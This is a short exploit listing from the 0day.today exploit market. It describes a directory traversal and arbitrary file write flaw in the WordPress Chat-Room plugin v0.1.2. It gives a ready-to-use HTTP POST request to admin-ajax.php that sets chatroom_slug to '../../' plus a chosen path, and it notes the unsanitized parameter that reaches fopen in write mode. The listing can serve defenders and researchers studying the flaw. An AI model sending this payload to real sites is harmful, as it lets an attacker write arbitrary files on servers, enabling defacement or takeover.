[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write Vulnerabilities

Author
malwrforensics
Risk
[
Security Risk High
]
0day-ID
0day-ID-27303
Category
web applications
Date add
13-03-2017
Platform
php
# Exploit Title: WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write
# Date: 2017-03-08
# Exploit Author: malwrforensics
# Vendor Homepage: https://webdevstudios.com/
# Software Link: https://wordpress.org/plugins/chat-room/
# Version: 0.1.2
# Tested on: WordPress 4.7.3, Ubuntu 16.04.2 LTS

#Folder used by the Chat-room plugin:
http://<server>/wp-content/uploads/chatter/

#POST http://<server>/wp-admin/admin-ajax.php HTTP/1.1
#...
#Referer: http://<server>/chat-room/<chat_name/
#...
#
#action=send_message&chatroom_slug=../../<new_path_and_file>&message=test

#Vulnerable file: chat-room.php
#function save_message():
# - the $chatroom_slug parameter is not sanitized
# - the log_filename parameters receives the value of $chatroom_slug
# - the write_log_file function is called which will do an
fopen($log_filename, 'w')

Thanks.

#  0day.today [2024-03-28]  #